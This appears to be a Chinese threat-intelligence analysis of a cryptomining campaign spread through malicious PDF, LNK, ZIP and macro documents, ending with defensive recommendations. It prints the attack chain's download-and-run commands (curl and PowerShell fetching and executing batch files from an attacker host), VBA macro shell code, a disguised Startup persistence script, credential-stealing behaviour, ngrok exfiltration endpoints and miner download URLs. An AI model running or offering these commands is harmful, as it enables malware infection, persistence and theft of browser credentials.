未知黑产组织通过多种载荷传播挖矿程序手法剖析

概述

近期发现一个未知黑产组织通过多种载荷（PDF、LNK、ZIP、XLSM、DOCM等）传播挖矿程序，其攻击链具有以下特点：

• 最终外联地址均为 https://xxxxxx.click/bat/ 开头的URL
• VT平台上近一半关联样本0报毒
• 攻击链最终目标是下载并运行挖矿程序
• 同时具备窃取浏览器cookies和登录密码的能力

多种传播方式分析

PDF文件传播

样本特征：

• MD5: DD3587FFFAAE10EB339EA0EC1B2FC1DA
• 利用Foxit PDF Reader软件缺陷设计

攻击流程：

1. 触发漏洞后从 https://xxxxxx.click/bat/bostar4 下载bat文件
2. bat文件内容：

   curl https://xxxxxx.click/bat/bostar4 -o "C:\Users\Public\mems.bat"
   

下载的bat脚本功能：

1. 访问Facebook页面（意图不明）
2. 下载并创建自启动项
3. 下载python环境包和py脚本
4. 执行py脚本

LNK文件传播

样本特征：

• MD5: 75F78C018AC77A493CD88A049AE59F8A

攻击流程：

1. 从 https://xxxxxx.click/bat/ld 下载并运行bat文件
2. 快捷方式内容：

   powershell.exe Invoke-WebRequest -URI https://xxxxxx.click/bat/ld -OutFile C:/Users/Public/img.bat;powershell C:/Users/Public/img.bat
   

下载的bat脚本功能：
与PDF传播方式类似，但不访问Facebook

ZIP文件传播

样本特征：

• MD5: A2F368FFADE32738CE0AC52AB51BD3FF
• 文件名经过精心构造，疑似用于网络钓鱼

攻击流程：

1. 解压后为bat文件
2. 从 https://xxxxxx.click/bat/anhoang 下载并运行bat文件
3. bat文件内容：

   curl https://xxxxxx.click/bat/anhoang -o "C:\Users\Public\memser.bat"
   

特点：
使用不同的zip解压方式

XLSM文件传播

样本特征：

• MD5: B1CC116028567ED95BAF1A8E10FEC520

攻击流程：

1. 通过宏代码下载并运行bat文件
2. 外联地址：https://xxxxxx.click/bat/lapbun
3. 宏代码内容：

   C:\Windows\System32\cmd.exe curl https://xxxxxx.click/bat/lapbun -o C:\Users\Public\mem.bat & C:\Users\Public\mem.bat
   

DOCM文件传播

样本特征：

• MD5: 49A4395FBDF77B5D275E992FBF457A89

攻击流程：

1. 通过宏代码下载并运行bat文件
2. 外联地址：https://xxxxxx.click/bat/lapbun
3. 宏代码内容：

   CMDPath = "C:\Windows\System32\cmd.exe"
   CMDCommand = "curl https://xxxxxx.click/bat/lapbun -o C:\Users\Public\mems.bat & C:\Users\Public\mems.bat"
   Shell CMDPath & " /c " & CMDCommand, vbNormalFocus
   

攻击链完整梳理

/bat/xxx 阶段

功能：

1. 下载自启动脚本到启动目录：

   Invoke-WebRequest -URI https://xxxxxx.click/config/stu -OutFile "C:\Users\[用户名]\AppData\Roaming\Microsoft\Windows\'Start Menu'\Programs\Startup\WindowsUpdate.bat"
   

2. 下载python环境包：

   mkdir "C:\Users\Public\python39"
   curl https://xxxxxx.click/app/python39.zip -o "C:\Users\Public\python39\python39.zip"
   

3. 解压python环境：

   tar -xf C:\Users\Public\python39\python39.zip -C "C:\Users\Public\python39"
   

4. 下载py脚本：

   curl https://xxxxxx.click/py/[文件名] -o "C:\Users\Public\python39\documents.py"
   

5. 执行py脚本：

   C:\Users\Public\python39\python.exe "C:\Users\Public\python39\documents.py"
   

/py/xxx 阶段

功能：
获取 https://xxxxxx.click/pyen/ 开头的URL载荷内容

示例：

vari = requests.get('https://xxxxxx.click/pyen/bostar4').text

/pyen/xxx 阶段

功能：
提供base64编码的py脚本，主要功能：

1. 窃取主机信息
2. 窃取浏览器cookies和登录密码
3. 判断主机归属地
4. 外联发送数据
5. 下载挖矿程序

Py脚本详细分析

混淆处理

使用大量长字符串命令的变量名和函数名进行混淆

窃取主机信息

获取当前登录用户及IP地址信息

窃取浏览器数据

窃取Chrome、Edge等浏览器的cookies和登录密码

归属地判断

根据国家地区代码判断是否发起外联请求，涉及国家包括：

• ZM (赞比亚)
• YE (也门)
• TV (图瓦卢)
• TG (多哥)
• TO (汤加)
• SA (沙特阿拉伯)
• MW (马拉维)
• KE (肯尼亚)
• V (瓦努阿图)
• GA (加蓬)
• ET (埃塞俄比亚)
• DM (多米尼克)
• BE (比利时)

外联发送数据

使用ngrok代理外联发送数据，URL示例：

https://1793-103-68-109-198.ngrok-free.app
https://5edf-103-68-109-200.ngrok-free.app

下载挖矿程序

从以下地址获取挖矿程序下载链接：

https://xxxxxx.click/miner/c
https://xxxxxx.click/miner/g

实际下载地址：

https://gitlab.com/topworld20241/none/-/raw/main/xmrig.zip?inline=false
https://gitlab.com/topworld20241/none/-/raw/main/lolMiner.zip?inline=false

挖矿程序分析

lolMiner

从 config.vbs 中提取矿池信息：

stratum+tcp://pool.minexmr.com:4444

xmrig

从 config.vbs 中提取矿池信息：

stratum+tcp://xmr.pool.minergate.com:45771

防御建议

1. 禁用不必要的宏执行
2. 更新PDF阅读器到最新版本
3. 监控可疑的powershell和cmd活动
4. 阻止对已知恶意域名的访问
5. 监控系统启动项变更
6. 注意可疑的python环境安装
7. 阻止对ngrok免费域名的访问
8. 监控对gitlab等代码托管平台的异常访问